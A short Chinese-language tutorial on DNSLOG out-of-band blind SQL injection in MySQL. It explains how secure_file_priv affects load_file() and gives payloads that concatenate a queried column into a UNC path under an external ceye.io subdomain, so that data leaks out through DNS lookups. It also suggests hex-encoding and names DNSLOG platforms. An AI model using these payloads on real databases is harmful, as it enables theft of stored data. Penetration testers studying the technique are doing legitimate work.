利用DNSLOG花式实现无回显注入

通过DNSlog盲注需要用的load_file()函数,所以一般得是root权限。show variables like ‘%secure%’;查看load_file()可以读取的磁盘。

1、当secure_file_priv为空,就可以读取磁盘的目录。

2、当secure_file_priv为G:\,就可以读取G盘的文件。

3、当secure_file_priv为null,load_file就不能加载文件。

4、通过设置my.ini来配置。secure_file_priv=””就是可以load_flie任意磁盘的文件。

Payload:

1、select load_file(‘\\\\afanti.xxxx.ceye.io\\aaa’); 其中afanti为sql语句

2、select load_file(concat(‘\\\\’,(select 字段 from 表名 limit 1),’.xxxx.ceye.io\abc’))

3、如果是读取数据名称或者其他等带有敏感字符的数据时可采用HEX编码格式即Hex(select * from *);

DNSLOG平台搭建

1、使用已有平台 ceye.io

2、是有开源源码。

3、使用burpsuite Burp CoLLaborator client 功能